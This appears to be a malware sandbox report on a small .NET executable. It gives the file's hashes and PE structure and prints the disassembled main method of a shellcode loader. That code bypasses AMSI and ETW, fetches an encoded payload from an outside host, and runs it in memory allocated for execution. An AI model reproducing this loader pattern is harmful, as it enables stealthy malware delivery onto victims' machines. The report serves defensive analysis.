Suspicious
Suspect

b3a2b2125bd46e90590d66270061f7dd

PE Executable
|
MD5: b3a2b2125bd46e90590d66270061f7dd
|
Size: 10.75 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
b3a2b2125bd46e90590d66270061f7dd
Sha1
f23f8b6501e356574122b08340c886e9cd96f12b
Sha256
8bedd9a6bc1b9fa0a9158352dae15181e354e187da8ea79c61418802d96b34b5
Sha384
bad13ab465ae24bc47cd692234547bbeb8548af1a5ff5c4dab3bbaaf086ff4d1899f25ff02e99012cca8755ac1da8ab4
Sha512
8e22a2c40df0f6fd6cf84cf71e4f6695e9617e74f7881e8c4ff4d52d980f116b1e51ae80b51916da9d9be17c0280f2bf4e621eb94c64ffebb003c0368967786e
SSDeep
192:vYycF0sil5/2HUy78SyvqBOeIpTaBOtQbM3aL:vYZF0qEqIeIeBOy
TLSH
C6220901B7F88A95D83E1776D8B307416774A54B4B26CB8F14CD922F2EB33D04196BB2
File Structure
b3a2b2125bd46e90590d66270061f7dd
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

123.exe
Full Name

123.exe
EntryPoint

System.Void Loader::Main()
Scope Name

123.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

123
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

36
Main Method

System.Void Loader::Main()
Main IL Instruction Count

197
Main IL

nop <null> ldstr === SGN Loader 开始执行 === call System.Void Loader::Log(System.String) nop <null> nop <null> call System.Void Loader::BypassAmsi() nop <null> call System.Void Loader::BypassEtw() nop <null> ldstr a2VybmVsMzIuZGxs call System.String Loader::D(System.String) call System.IntPtr Loader::GetModuleHandle(System.String) stloc.0 <null> ldloc.0 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) stloc.s V_10 ldloc.s V_10 brfalse.s IL_004B: ldstr "[+] kernel32.dll 加载成功" nop <null> ldstr [-] GetModuleHandle 失败 call System.Void Loader::Log(System.String) nop <null> leave IL_023E: ret ldstr [+] kernel32.dll 加载成功 call System.Void Loader::Log(System.String) nop <null> ldloc.0 <null> ldstr VmlydHVhbEFsbG9j call System.String Loader::D(System.String) call Loader/VirtualAlloc Loader::GetApi<Loader/VirtualAlloc>(System.IntPtr,System.String) stloc.1 <null> ldloc.0 <null> ldstr Q3JlYXRlVGhyZWFk call System.String Loader::D(System.String) call Loader/CreateThread Loader::GetApi<Loader/CreateThread>(System.IntPtr,System.String) stloc.2 <null> ldloc.0 <null> ldstr V2FpdEZvclNpbmdsZU9iamVjdA== call System.String Loader::D(System.String) call Loader/WaitForSingleObject Loader::GetApi<Loader/WaitForSingleObject>(System.IntPtr,System.String) stloc.3 <null> ldloc.1 <null> brfalse.s IL_0095: ldc.i4.1 ldloc.2 <null> brfalse.s IL_0095: ldc.i4.1 ldloc.3 <null> ldnull <null> ceq <null> br.s IL_0096: stloc.s V_11 ldc.i4.1 <null> stloc.s V_11 ldloc.s V_11 brfalse.s IL_00AD: ldstr "[+] API 解析成功" nop <null> ldstr [-] API 解析失败 call System.Void Loader::Log(System.String) nop <null> leave IL_023E: ret ldstr [+] API 解析成功 call System.Void Loader::Log(System.String) nop <null> ldstr aHR0cDovL3RocmVhZGV0LnRvcC8xMTEuYmlu call System.String Loader::D(System.String) call System.Byte[] Loader::DownloadShellcode(System.String) stloc.s V_4 ldloc.s V_4 brfalse.s IL_00D5: ldc.i4.1 ldloc.s V_4 ldlen <null> ldc.i4.0 <null> ceq <null> br.s IL_00D6: stloc.s V_12 ldc.i4.1 <null> stloc.s V_12 ldloc.s V_12 brfalse.s IL_00ED: ldstr "[+] 下载完成,原始大小: {0} 字节" nop <null> ldstr [-] 下载失败 call System.Void Loader::Log(System.String) nop <null> leave IL_023E: ret ldstr [+] 下载完成,原始大小: {0} 字节 ldloc.s V_4 ldlen <null> conv.i4 <null> box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.Void Loader::Log(System.String) nop <null> ldloc.s V_4 call System.Byte[] Loader::SgnDecode(System.Byte[]) stloc.s V_5 ldstr [+] SGN 解码成功,解码后大小: {0} 字节 ldloc.s V_5 ldlen <null> conv.i4 <null> box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.Void Loader::Log(System.String) nop <null> ldloc.1 <null> ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_5 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.s 64 callvirt System.IntPtr Loader/VirtualAlloc::Invoke(System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_6 ldloc.s V_6 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) stloc.s V_13 ldloc.s V_13 brfalse.s IL_0163: ldstr "[+] 内存分配成功: 0x{0:X16}" nop <null> ldstr [-] VirtualAlloc 失败 call System.Void Loader::Log(System.String) nop <null> leave IL_023E: ret ldstr [+] 内存分配成功: 0x{0:X16} ldloca.s V_6 call System.Int64 System.IntPtr::ToInt64() box System.Int64 call System.String System.String::Format(System.String,System.Object) call System.Void Loader::Log(System.String) nop <null> ldloc.s V_5 ldc.i4.0 <null> ldloc.s V_6 ldloc.s V_5 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) nop <null> ldstr [+] Shellcode 已写入内存 call System.Void Loader::Log(System.String) nop <null> ldc.i4.0 <null> stloc.s V_7 ldloc.2 <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_6 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_7 callvirt System.IntPtr Loader/CreateThread::Invoke(System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_8 ldloc.s V_8 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) stloc.s V_14 ldloc.s V_14 brfalse.s IL_01D4: ldstr "[+] 线程创建成功,TID: {0}" nop <null> ldstr [-] CreateThread 失败 call System.Void Loader::Log(System.String) nop <null> leave.s IL_023E: ret ldstr [+] 线程创建成功,TID: {0} ldloc.s V_7 box System.UInt32 call System.String System.String::Format(System.String,System.Object) call System.Void Loader::Log(System.String) nop <null> ldloc.3 <null> ldloc.s V_8 ldc.i4.m1 <null> callvirt System.UInt32 Loader/WaitForSingleObject::Invoke(System.IntPtr,System.UInt32) stloc.s V_9 ldloc.s V_9 brfalse.s IL_020D: ldstr "[+] Shellcode 执行完成" ldstr [-] Wait 失败: 0x{0:X} ldloc.s V_9 box System.UInt32 call System.String System.String::Format(System.String,System.Object) br.s IL_0212: call System.Void Loader::Log(System.String) ldstr [+] Shellcode 执行完成 call System.Void Loader::Log(System.String) nop <null> nop <null> leave.s IL_0233: ldstr "=== Loader 结束 ===" stloc.s V_15 nop <null> ldstr [!] 异常: {0} ldloc.s V_15 call System.String System.String::Format(System.String,System.Object) call System.Void Loader::Log(System.String) nop <null> nop <null> leave.s IL_0233: ldstr "=== Loader 结束 ===" ldstr === Loader 结束 === call System.Void Loader::Log(System.String) nop <null> ret <null>
b3a2b2125bd46e90590d66270061f7dd (10.75 KB)
File Structure
b3a2b2125bd46e90590d66270061f7dd
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙